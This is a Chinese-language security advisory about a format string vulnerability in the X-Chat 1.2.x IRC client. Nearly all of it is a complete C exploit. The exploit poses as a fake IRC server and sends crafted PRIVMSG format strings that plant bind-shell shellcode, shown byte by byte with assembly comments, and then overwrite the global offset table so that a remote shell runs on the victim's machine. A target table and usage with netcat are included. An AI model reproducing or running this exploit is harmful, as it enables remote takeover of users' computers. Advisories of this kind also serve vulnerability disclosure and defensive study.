X-Chat 存在格式化字符串漏洞发布时间:2001-05-30 更新时间:2001-05-30 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 X-Chat version 1.2.x详细描述 XCHAT(http://www.xchat.org/)是UNIX操作系统的IRC客户端程序,其中 在他们的NICKNAME部分存在格式化字符串漏洞,允许执行任意代码。 测试代码 /* X-Chat 1.2.x format bug exploit by sectorx of xor * THIS IS CONFIDENTIAL PROPERTY OF XOR TEAM, AND MAY NOT BE DISTRIBUTED * * *note* this is a beta version, expect more of this. */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <sys/time.h> #define VULNERABLE 1 typedef struct { char name[80]; int got; int ret; /* this should be a stack/data segment address where we * upload the shellcode to, and execute it */ int offset; int len; } vuln; vuln VULN[VULNERABLE] = { { "X-Chat 1.2.1/Slackware 7.1",0x08105cac,0x8134021,81,4 } }; char portshell[] = /* anathema's portshell code: */ /* main: */ "\xeb\x72" /* jmp callz */ /* start: */ "\x5e" /* popl %esi */ /* socket() */ "\x29\xc0" /* subl %eax, %eax */ "\x89\x46\x10" /* movl %eax, 0x10(%esi) */ "\x40" /* incl %eax */ "\x89\xc3" /* movl %eax, %ebx */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x40" /* incl %eax */ "\x89\x46\x08" /* movl %eax, 0x08(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ /* bind() */ "\x43" /* incl %ebx */ "\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ "\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ "\x88\x46\x08" /* movb %al, 0x08(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x89\xc2" /* movl %eax, %edx */ "\x89\x46\x18" /* movl %eax, 0x18(%esi) */ "\xb0\x90" /* movb $0x90, %al */ "\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ "\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ "\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ /* listen() */ "\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ "\x43" /* incl %ebx */ "\x43" /* incl %ebx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ /* accept() */ "\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ "\x89\x56\x10" /* movl %edx, 0x10(%esi) */ "\xb0\x66" /* movb $0x66, %al */ "\x43" /* incl %ebx */ "\xcd\x80" /* int $0x80 */ /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */ "\x86\xc3" /* xchgb %al, %bl */ "\xb0\x3f" /* movb $0x3f, %al */ "\x29\xc9" /* subl %ecx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ /* execve() */ "\x88\x56\x07" /* movb %dl, 0x07(%esi) */ "\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ "\xb0\x0b" /* movb $0x0b, %al */ "\xcd\x80" /* int $0x80 */ /* callz: */ "\xe8\x89\xff\xff\xff" /* call start */ "/bin/sh"; void upload(unsigned char *str, int length, int address, int sys) { int i; for (i=0;i<length;i++) { int target; unsigned short int word; word = str[i] + 0x0100; target = address + i; printf(":%.4s%%.%dx%%%d$n!a@a PRIVMSG #own :%c\n", &target,word-VULN[sys].len,VULN[sys].offset,0x70+(rand() % 0x10)); fflush(stdout); } } int main(int argc, char *argv[]) { char *ircd = "haxornet"; int sys; fprintf(stderr, "X-Chat 1.2.x exploit (c) sectorx of xor\n"); fprintf(stderr, "\E[1m\E[31mTHIS IS CONFIDENTIAL PROPERTY OF XOR TEAM, AND MAY NOT BE DISTRIBUTED.\033[0m\n\n"); if (argc < 2) { int i; printf("Usage: (%s <target type> ; cat)|nc -l -p 6667\n",argv[0]); printf("Target types:\n"); for (i=0;i<VULNERABLE;i++) { printf("%d\t:\t%s\n",i,VULN[i].name); } exit(1); } sys = atoi(argv[1])>=VULNERABLE?0:atoi(argv[1]); /* connect user to fake server */ printf("NOTICE AUTH :*** Welcome to my ircd\n"); printf(":%s 001 user1 :Welcome to %1$s\n",ircd); printf(":%s 002 user1 :Your host is %1$s\n",ircd); printf(":%s 376 user1 :End of /MOTD command.\n",ircd); printf(":user1 MODE user1 :+i\n"); printf(":user1!user1@user1.hostname JOIN :#own\n"); printf(":%s MODE #own +nt\n",ircd); printf(":%s 353 user1 = #own :@user1\n"); printf(":%s 366 user1 #own :End of /NAMES list.\n"); /* Upload shellcode to target address */ upload(portshell,strlen(portshell),VULN[sys].ret,sys); /* Change global offset table */ upload((char*)&VULN[sys].ret,4,VULN[sys].got,sys); } 解决方案 尚无 相关信息 sectorx at themarines.com |
